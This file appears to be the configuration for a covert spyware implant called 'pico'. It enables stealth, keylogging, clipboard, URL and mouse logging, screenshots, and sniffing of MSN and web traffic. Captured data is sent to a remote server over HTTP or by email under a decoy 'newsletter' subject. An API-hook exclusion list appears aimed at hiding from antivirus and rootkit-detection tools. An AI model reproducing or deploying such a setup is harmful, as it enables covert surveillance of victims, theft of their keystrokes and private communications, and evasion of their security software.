; pico Configuration file
; * be sure there's at least one \r\n in the end! *

; encryption key
ENCRYPTION_KEY=EAF74DC0D8B866485085CD6B528A3104EAF74DC0D8B866485085CD6B528A3104

; events threshold before flushing to disk (max 65535)
EVENT_INMEMORY_THRESHOLD=100

; maximum size of event data (kb)
EVENT_DATA_MAXSIZE=1000

; maximum cache size (mb,cachetype). If cachetype is 1 cache is cyclic (older files are deleted to make space for newer)
CACHE_MAXSIZE=32,1

; enable stealth
USE_STEALTH=1

; log url events
LOG_URL=1

; log keyboard events
LOG_KEYBOARD=1

; log mouse events (leftclick only)
LOG_MOUSE=1

; log clipboard on the fly (0=disabled,1=only text formats,2=all formats)
LOG_CLIPBOARD=1

; size of each chunk for sendmessage (in kb, if 0 no chunked send)
SENDMESSAGE_CHUNKSIZE=20

; duration of a single sendmessage (seconds). Big messages wait for this timeout during send of each chunk
SENDMESSAGE_DURATION=5

; communicate only when (default)browser is alive. SENDMESSAGE_DURATION is ignored if this is active.
CHECK_BROWSER_FOR_COMM=0

;interval between each screenshot dump, in seconds. if 0, screenshots are made on request only
SCREENSHOT_INTERVAL=0

; mailfrom for sendmail (max 64 char)
SENDMESSAGE_MAILFROM=user@localhost
 
; subject for sendmail (max 256 char)
SENDMESSAGE_MAILSUBJECT=newsletter

; interval between each receive-messages session (seconds).
RECEIVEMESSAGE_SESSION_INTERVAL=10

; communication method (0=email,1=http,2=cycle)
COMMUNICATION_METHOD=1

; send sysinfo at startup
SYSINFO_STARTUP=1

; communication after x reboots (0=communicate immediately)
ACTIVATE_COMM_AFTER_REBOOT=0

; servers list
SERVER=http,192.168.1.50,80,/mypico
;SERVER=http,192.168.2.12,80,/mypico

; stealth apihook exclusion list
APIHK_EXCLUDE=rk
APIHK_EXCLUDE=bl
APIHK_EXCLUDE=root
APIHK_EXCLUDE=hook
APIHK_EXCLUDE=hk
APIHK_EXCLUDE=key
APIHK_EXCLUDE=svv
APIHK_EXCLUDE=anti
APIHK_EXCLUDE=wscn
APIHK_EXCLUDE=sym
APIHK_EXCLUDE=ccapp
APIHK_EXCLUDE=trj

;
; plugins rules (every plugin will parse these keys and get the ones needed)
; pluginname,parameters

; plgpisck (sockets sniffer)
; ruleformat : pluginname,protocol (TCP/UDP/RAW/*),dstport,kbytes/-1/0,in/out/allsep/alltog
;
; msn
PLUGRULE=plgpisck.dll,tcp,1863,30,alltog
; web
PLUGRULE=plgpisck.dll,tcp,80,30,alltog

; voipplg (voip sniffer)
; ruleformat : pluginname,processname_substring
;
;PLUGRULE=plgvoip.dll,msn
;PLUGRULE=plgvoip.dll,skype
